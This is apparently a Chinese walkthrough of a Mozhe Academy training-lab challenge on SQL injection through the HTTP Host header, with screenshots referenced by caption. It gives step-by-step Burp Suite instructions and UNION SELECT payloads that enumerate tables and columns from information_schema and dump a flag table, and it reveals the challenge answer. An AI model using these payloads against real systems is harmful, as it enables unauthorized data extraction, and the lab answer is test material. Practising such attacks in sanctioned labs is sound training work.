墨者学院-SQL注入漏洞测试(HTTP头注入)

SQL注入漏洞测试(HTTP头注入)

难易程度:★★
题目类型:SQL注入
使用工具:FireFox浏览器、burpsuite

1.打开靶场,使用burpsuite访问网页,截包。

2.把包send to repeater,根据题目为host注入,把host改为or 1=1,报错,证明存在注入。
墨者学院-SQL注入漏洞测试(HTTP头注入)_第1张图片
3.输入union select 1,2,3,4 查看回显位置。
墨者学院-SQL注入漏洞测试(HTTP头注入)_第2张图片
4.输入union select 1,2,3,(select group_concat(table_name) from information_schema.tables where table_schema=database()) 查看表名。
墨者学院-SQL注入漏洞测试(HTTP头注入)_第3张图片
显示四个表名,肯定在flag表里。

5.输入union select 1,2,3,(select group_concat(column_name) from information_schema.columns where table_name=‘flag’) 查看列名。
墨者学院-SQL注入漏洞测试(HTTP头注入)_第4张图片
显示列名id和flag。

6.输入union select 1,2,3,(select group_concat(flag) from flag) 查看flag。
墨者学院-SQL注入漏洞测试(HTTP头注入)_第5张图片
得到flag is mozhe547986。

7.输入flag,得到key。
墨者学院-SQL注入漏洞测试(HTTP头注入)_第6张图片

你可能感兴趣的:(墨者学院-SQL注入漏洞测试(HTTP头注入))